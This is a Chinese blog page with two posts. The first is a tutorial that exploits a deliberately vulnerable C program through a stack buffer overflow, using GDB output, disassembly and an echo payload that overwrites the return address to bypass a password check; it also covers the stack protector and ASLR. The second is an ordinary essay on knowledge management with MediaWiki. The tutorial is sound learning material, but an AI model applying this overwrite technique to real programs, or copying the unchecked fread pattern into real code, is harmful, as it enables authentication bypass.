分类 技术志 下的文章

利用缓冲区溢出漏洞Hack应用

我们在平时编码过程中很少考虑代码的安全性(security),与正确性、高性能和可移植性相比,安全性似乎总被忽略。昨天从安全性角度泛泛地Review了一下现有的代码,发现了不少具有安全隐患的地方。我们的程序员的确缺乏系统地有关安全编码方面的训练和实践,包括我在内,在安全编码方面也都是初级选手,脑子中对安全性编码缺乏系统的理解。

市面上讲解编码安全性方面的书籍也不是很多,在C编码安全性方面,CERT(Carnegie Mellon University's Computer Emergency Response Team)专家Robert Seacord的《C和C++安全编码》一书对安全性编码方面做了比较系统的讲解。Robert还编写了一本名为《C安全编码标准》的书,这本书可以作为指导安全编码实践的参考手册。

浏览了一下《C和C++安全编码》,你会发现多数漏洞(vulnerability)都与缓冲区溢出(buffer overflow)有关。要想学会更好的防守,就要弄清楚漏洞是如何被利用的,在这里我们就来尝试一下如何利用缓冲区漏洞Hack应用。

有这样一段应用代码:
/* bufferoverflow.c */
int ispasswdok() {
    char passwd[12];
    memset(passwd, 0, sizeof(passwd));

    FILE *p = fopen("passwd", "rb");
    fread(passwd, 1, 200, p);
    fclose(p);

    if (strcmp(passwd, "123456") == 0) {
        return 0;
    } else {
        return -1;
    }
}

int main() {
    int passwdstat = -1;

    passwdstat = ispasswdok();
    if (passwdstat != 0) {
        printf ("invalid!\n");
        return -1;
    }

    printf("granted!\n");
    return 0;
}

这显然是故意“制造”的一段程序。原本密码(passwd)的输入是通过gets函数从标准输入获得的,但考虑到Hack时非可显示的ASCII码不易展示和输入,这里换成了fread,并且故意在fread使用中留下了隐患。我们Hack的目标很明确,就是在不知道密码的前提下,让这个程序输出"granted!",即绕过密码校验逻辑。

Hack的原理这里简述一下。我们知道C程序的运行其实就是一系列的过程调用,而过程调用本身是依赖系统为程序建立的运行时堆栈(stack)的,每个过程(Procedure)都有自己的栈帧(stack frame),各个过程的栈帧在运行时stack上按照调用的先后顺序从栈底向栈顶延伸排列。系统使用扩展基址寄存器(extended base pointer,%ebp)和扩展栈寄存器(extended stack pointer,%esp)来指示当前过程的栈帧。系统通过调整%ebp和%esp的方式按照特定的机制在各个过程的栈帧上切换,实现过程调用(call)和从过程调用返回(ret)。

执行子过程调用指令(call)时,系统先将该call指令的下一条顺序指令的地址(%eip),即子过程调用的返回地址存储在stack上,作为过程调用者栈帧的结尾,然后将%ebp也压入stack,作为子过程栈帧的开始,最后系统跳转到子过程的起始地址开始执行。总的来说,子过程调用call的执行相当于:

push %eip
push %ebp

子过程在其开始处将调用者的%ebp保存在栈上,并建立自己的%ebp;子过程调用结束前,leave指令首先恢复调用者的%ebp和%esp,之后ret指令将存储在stack的调用者的返回地址恢复到指令寄存器%eip中,并跳转到该地址上执行后续指令,这样系统就从子过程返回继续原过程的执行了。

这里的Hack就是利用重写返回地址来达到绕过密码校验过程的目的。返回地址与局部变量存储在同一栈上且系统没有对栈越界修改进行校验(一般情况是这样的)让Hack成为可能。我们通过GDB反汇编来看看main栈帧与ispasswdok栈帧在内存中的布局情况。

我们首先将breakpoint设置在ispasswdok过程被调用前,设置断点后run:

$ gdb bufferoverflow
… …
(gdb) break 20
Breakpoint 1 at 0×8048591: file bufferoverflow.c, line 20.
(gdb) run
Starting program: /home/tonybai/test/c/bufferoverflow

Breakpoint 1, main () at bufferoverflow.c:20
20        int passwdstat = -1;

我们查看一下当前main的栈帧情况:
(gdb) info registers
esp            0xbffff100    0xbffff100
ebp            0xbffff128    0xbffff128
eip            0×8048591    0×8048591 [main+9]

可以看到main栈帧起始于0xbffff128。我们继续在ispasswdok处设置断点,继续执行。
(gdb) break ispasswdok
Breakpoint 2 at 0x804850a: file bufferoverflow.c, line 6.
(gdb) continue
Continuing.

Breakpoint 2, ispasswdok () at bufferoverflow.c:6
6        memset(passwd, 0, sizeof(passwd));

现在程序已经执行到ispasswdok过程中,我们也可以看到ispasswdok栈帧情况了:
(gdb) info registers
esp            0xbffff0d0    0xbffff0d0
ebp            0xbffff0f8    0xbffff0f8
eip            0x804850a    0x804850a [ispasswdok+6]

可以看到ispasswdok过程的栈帧起始于0xbffff0f8。前面说过子过程的%ebp指向的栈单元存储的是其调用者栈帧的起始地址,即其调用者的%ebp。我们来查看一下是否是这样:

(gdb) x/4wx 0xbffff0f8
0xbffff0f8:    0xbffff128    0x0804859e    0×00284324    0x00283ff4

我们通过x/命令查看起始地址为0xbffff0f8的栈上连续4个4字节存储单元的值,可以看到0xbffff0f8处栈单元内的确存储是的main栈帧的%ebp,其值与前面main栈帧输出的结果相同。那么按照之前所说的,紧挨着这个地址的值就应该是ispasswdok过程调用的返回地址了,也就是我们要改写的那个地址,我们看到这个地址的值为0x0804859e。我们通过反汇编看看main过程的指令:

(gdb) disas main
Dump of assembler code for function main:
   0×08048588 [+0]:    push   %ebp
   0×08048589 [+1]:    mov    %esp,%ebp
   0x0804858b [+3]:    and    $0xfffffff0,%esp
   0x0804858e [+6]:    sub    $0×20,%esp
   0×08048591 [+9]:    movl   $0xffffffff,0x1c(%esp)
   0×08048599 [+17]:    call   0×8048504 [ispasswdok]
   0x0804859e [+22]:    mov    %eax,0x1c(%esp)
   … …

可以看到0x0804859e就是ispasswdok调用后的下一条指令,看来它的确是我们想要找到地址。找到了要改写的地址,我们还要找到外部数据的入口,这个入口即是ispasswdok过程中的局部变量passwd。

passwd的起始地址是什么?我们通过ispasswdok的反汇编代码来分析:

(gdb) disas ispasswdok
Dump of assembler code for function ispasswdok:
   0×08048504 [+0]:    push   %ebp
   0×08048505 [+1]:    mov    %esp,%ebp
   … …
   0×08048555 [+81]:    lea    -0×18(%ebp),%eax
   0×08048558 [+84]:    mov    %eax,(%esp)
   0x0804855b [+87]:    call   0x804842c [fread@plt]
   … …

可以看到在为fread准备实际参数时,系统用了-0×18(%ebp),显然这个地址就是passwd数组的始地址,即0xbffff0f8 – 0×18处。综上,我们用一幅简图来形象的说明一下各个重要元素:

– 高地址,栈底
… …
0xbffff0fc:  0x0804859e   <- 存储的值是main设置的ispasswdok过程的返回地址
——————————————————
0xbffff0f8:  0xbffff128   <- ispasswdok的%ebp,存储的值为main的%ebp
0xbffff0f4:  0x08049ff4
0xbffff0f0:  0x0011e0c0
0xbffff0ec:  0x0804b008
0xbffff0e8:  0×00000000
0xbffff0e4:  0×00000000
0xbffff0e0:  0×00000000   <- passwd数组的起始地址
… …
– 低地址,栈顶

我们现在需要做的就是从0xbffff0e0这个地址开始写入数据,一直写到ispasswdok过程的返回地址,用新的地址值覆盖掉原有的返回地址0x0804859e。我们需要精心构造一个密码文件(passwd):

echo -ne "aaaaaaaaaaaa\x08\xb0\x04\x08\xc0\xe0\x11\x00\xf4\x9f\x04\x08\x28\xf1\xff\xbf\xc4\x85\x04\x08" > passwd

这里我们将passwd数组用字符'a'填充,将0x0804859e这个返回地址改写为0x080485c4,我们通过disas main可以看到这个跳转地址对应的指令:

(gdb) disas main
Dump of assembler code for function main:
   0×08048590 [+0]:    push   %ebp
   0×08048591 [+1]:    mov    %esp,%ebp
   … …
   0x080485c4 [+52]:    movl   $0x80486ba,(%esp)  ;程序执行跳转到这里
   0x080485cb [+59]:    call   0x804841c [puts@plt] ; 输出granted!
   0x080485d0 [+64]:    mov    $0×0,%eax
   0x080485d5 [+69]:    leave 
   0x080485d6 [+70]:    ret   

我们在GDB中完整的执行一遍bufferoverflow:
$ gdb bufferoverflow
(gdb) run
Starting program: /home/tonybai/test/c/bufferoverflow
granted!

Program exited normally.

Hack成功!(环境:gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5), GNU gdb (GDB) 7.1-ubuntu)

GCC默认在目标代码中加入stack smashing protector(-fstack-protector),在函数返回前,程序会检测特定的protector(又被称为canary,金丝雀)的值是否被修改,如果被修改了,则报错退出。上面的代码在编译时加入了-fno-stack-protector,否则一旦越界修改缓冲区外的地址,波及canary,程序就会报错退出。

另外bufferoverflow这个程序在GDB下执行可以成功Hack,但在shell下独立执行依旧会报错,dump core(发生在fclose里),对于此问题暂没有什么头绪。

后记:
经过分析,bufferoverflow程序在非GDB调试环境下独立执行时dump core的问题应该是由于Linux采用的ASLR技术所致。所谓ASLR就是Address-Space Layout Randomization,中文意思是地址空间布局随机化。正因为每次bufferoverflow的栈地址空间布局随机不同,因此事先精心挑选的那组hack数据才无法起到作用,并导致栈被破坏而dump core。

我们可以通过一个简单的测试程序看到ASLR的作用。
/* test_aslr.c */
int main() {
    int a;
    printf("a is at %p\n", &a);
    return 0;
}

下面多次执行该例程:
tonybai@PC-ubuntu:~/test/c$ test_aslr
a is at 0xbfbcb44c
tonybai@PC-ubuntu:~/test/c$ test_aslr
a is at 0xbfe3c8cc
tonybai@PC-ubuntu:~/test/c$ test_aslr
a is at 0xbfcc6d9c
tonybai@PC-ubuntu:~/test/c$ test_aslr
a is at 0xbfaea32c

可以看到每次栈上变量a的地址都不相同。

GDB默认关闭了ASLR,这才使得上面的Hack得以成型,通过GDB的信息也可以证实这一点:
(gdb) show disable-randomization
Disabling randomization of debuggee's virtual address space is on.

知识管理那些事儿

我不是知识管理领域的专家,但我认为知识的积累和管理对一个期望长久稳定发展的组织来说很重要。今天我这个"门外人"就来说几句"门外话"。

我所在的部门已经成立10余年了,但说实话部门在知识积累和管理方面做的比较一般。例如,没有统一的知识积累和管理平台,知识分享多靠mail列表,或将知识存储在文件中放入Microsoft Visual SourceSafe,若干日子后,再无人能找到之前的知识(VSS绝对不是一个知识管理平台,顶多就是一个版本管理工具,还是个有些落伍的工具);没有专人负责知识积累和管理;知识积累与管理似乎始终是优先级最低的那个任务。

近些年随着公司层面加强了对知识积累和管理的重视度,部门似乎也认识到了知识"丢失"现象的严重性,遂加强了知识积累方面的投入,但始终没有系统的知识积累和管理方案出台,部门内部依旧没有形成很好的知识积累的习惯。知识"丢失"不免让人痛心,于是今年年初我们决定自己在产品线内部搭建知识积累平台(采用MediaWiki),并指派专人负责知识库建设、策划、知识整理以及知识库的备份(自动备份)。就这样我们"摸着石头过河",一年下来收获颇丰。这里的收获指的不仅仅是积累的知识,还有宝贵的知识积累和管理的实践经验,更重要的是通过实践让我们更加认识到知识积累和管理的重要性,特别是对一个中等规模的组织而言。

我们的知识管理大致分为以下几个阶段。
一、知识库平台的建设
要想做知识积累和管理,首先要搭建一个知识管理的平台 – 知识库系统。组织内部的知识是由组织内部的人员协同生产出来的,除非你的组织需要特别专业的知识库管理平台以及特定的知识管理咨询服务,否则很多开源的Wiki工具可作为知识库的候选,比如TWiki、MediaWiki等。MediaWiki大家一定不陌生,因为世界上最大的知识库 - 维基百科(wikipedia)就是基于该工具搭建的,另外MediaWiki插件众多,也便于实现一些特定的需求。我们最终选择的也是MediaWiki。我这里倒没有什么选型的标准,只是觉得一款合格的知识库工具至少应具备一下几个特点:
- 访问方便,便于知识积累(例如,MediaWiki通过Browser访问,无需客户端装任何插件)
- 支持快速发现知识(例如,MediaWiki支持分类,标签,支持全文搜索,支持主题订阅)
- 适于协同创作,知识修改容易(这个本身就是Wiki的强项)
- 功能易扩展(例如,MediaWiki通过插件实现各种各样的功能,比如甘特图,日历)
- 知识展示手段丰富(例如,MediaWiki支持富文本,支持图片,内部和外部超链接等)

二、知识库结构策划阶段
每个组织都有自己特定的知识领域。知识库积累的就是在该领域内知识。积累前需要投入专人或小组来策划知识库的结构。将预想到的知识分门别类。分类由粗到细,甚至可以设置多级分类。为了便于知识发现,最好初始设定好一些常用的标签,这样通过搜索,我们就可以快速定位到知识所在。另外知识库的结构不是一成不变的,它应该随着知识库积累的知识的变化而适当变化,必要时需对知识库的结构做重构(比如发现之前的分类不合理)。知识库结构的重构带来的工作量有时候是很大的,所以尽量在初始情况下就全面合理地做好分类,避免后续重构。

三、知识积累阶段
知识库平台建立完毕后,就到了知识积累的阶段了,这个是全员参与的阶段。组织中的每个人都是知识库的贡献者。但事前最好制定一些知识积累的简要规程,比如规范知识提交的格式,规范主题的命名,段落格式等。知识积累阶段其实才是知识管理中最难的一个阶段,关键难在如何让组织内成员养成积极主动的进行知识积累的习惯,下面是一些可供参考的方法。

a) 适当宣导,让组织内成员意识到知识积累的重要性
b) 针对知识库平台的使用做适当的培训和交流
c) 将知识库平台打造的尽量易用,避免因复杂而导致排斥行为
d) 日常沟通多引用知识库中知识的位置,让大家在潜移默化中对知识库产生依赖

e) 引导关注。如果一个人贡献的知识受到大家的广泛关注,那么这个人将会有更大的热情贡献知识。组织内知识管理负责人可定期整理新增精品知识的简要并发给大家,吸引大家阅读知识,关注知识;通过展示知识关注度排名也可以激发大家的知识分享热情。

f) 发掘和鼓励"知识分享达人"。由"二八定律"我们可以推断,组织内20%的人贡献了80%的知识。我们要发掘出这些"达人",给予鼓励,必要时给予一定奖励。
g) 将之前组织积累的以文件形式存在的知识迁移到新平台上。尽量将内容Web化而不是以文件附件(不利于知识发现)形式存在;如果没有精力,可对知识做简要描述,建立文件位置索引,方便大家发现。并鼓励大家在知识库平台上查找以前积累的知识。

四、知识整理
由于知识库是组织内人员协同丰富的,新知识的提交带有一定随意性,点状分布,不成系统,所以这些知识需要专人定期整理,划入适当分类,赋予更加合理的标签,尽量使其系统化。这个工作十分必要,否则一旦长久,知识库内的知识就像一根根独木,独自生长,永远也成不了连片的树林。

五、知识备份
知识是宝贵的,大家花了心血贡献的知识要保存好,保存完整。这样就需要定期对知识库进行备份。一般可通过后台运行的脚本自动备份,粒度做到每天备份一次自然就最好了。

六、做好知识在不同层次知识库的流动
不同组织知识库的建设是不同的,有的组织采用统一的知识库,有些组织有不同层次的知识库。对于前者,没有什么可说的,大家的知识都会汇集到一个库中;对于后者,我们需要弄清楚知识库的层次,让知识合理地在不同层次的知识库间流动。一般而言,低级别知识库(如部门的知识库)会定期将精华的且适合在上一级组织(公司的知识库)分享的知识导入上一级别知识库,换句话说低级别知识库可作为高级别知识库的素材库。

关于我们的知识管理实践大致就这么六点内容,我们现阶段也是这么做的。后续我们要想在知识管理这块有所进阶,估计是需要请知识管理专家授业解惑了。

如发现本站页面被黑,比如:挂载广告、挖矿等恶意代码,请朋友们及时联系我。十分感谢! Go语言第一课 Go语言精进之路1 Go语言精进之路2 Go语言编程指南
商务合作请联系bigwhite.cn AT aliyun.com

欢迎使用邮件订阅我的博客

输入邮箱订阅本站,只要有新文章发布,就会第一时间发送邮件通知你哦!

这里是 Tony Bai的个人Blog,欢迎访问、订阅和留言! 订阅Feed请点击上面图片

如果您觉得这里的文章对您有帮助,请扫描上方二维码进行捐赠 ,加油后的Tony Bai将会为您呈现更多精彩的文章,谢谢!

如果您希望通过微信捐赠,请用微信客户端扫描下方赞赏码:

如果您希望通过比特币或以太币捐赠,可以扫描下方二维码:

比特币:

以太币:

如果您喜欢通过微信浏览本站内容,可以扫描下方二维码,订阅本站官方微信订阅号“iamtonybai”;点击二维码,可直达本人官方微博主页^_^:
本站Powered by Digital Ocean VPS。
选择Digital Ocean VPS主机,即可获得10美元现金充值,可 免费使用两个月哟! 著名主机提供商Linode 10$优惠码:linode10,在 这里注册即可免费获 得。阿里云推荐码: 1WFZ0V立享9折!


View Tony Bai's profile on LinkedIn
DigitalOcean Referral Badge

文章

评论

  • 正在加载...

分类

标签

归档



View My Stats